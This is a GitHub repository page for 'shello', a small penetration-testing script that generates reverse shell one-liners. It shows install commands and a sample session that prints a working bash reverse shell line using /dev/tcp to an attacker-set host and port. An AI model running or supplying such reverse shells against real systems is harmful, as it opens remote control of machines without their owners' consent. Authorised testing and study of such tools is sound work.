Skip to content

A small script to generate reverse shells.

Notifications You must be signed in to change notification settings

7h3-B14ck-Kn1gh75/shello

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 

Repository files navigation

shello

A small script to generate reverse shells.

image

Disclaimer:

This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this tool and software.

Installation:

$ wget https://raw.githubusercontent.com/Yuma-Tsushima07/shello/main/shello.sh
$ chmod +x shello.sh

Useage:

$ ./shello.sh

Choose a reverse shell which you want then specify your LHOST and LPORT: image

[+] Select an Option:  1

[ + ] Enter LHOST:   10.10.10.10

[ + ] Enter LPORT:  9001

[*] Your Bash-i Shell:  
sh -i >& /dev/tcp/10.10.10.10/9001 0>&1

About

A small script to generate reverse shells.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Shell 100.0%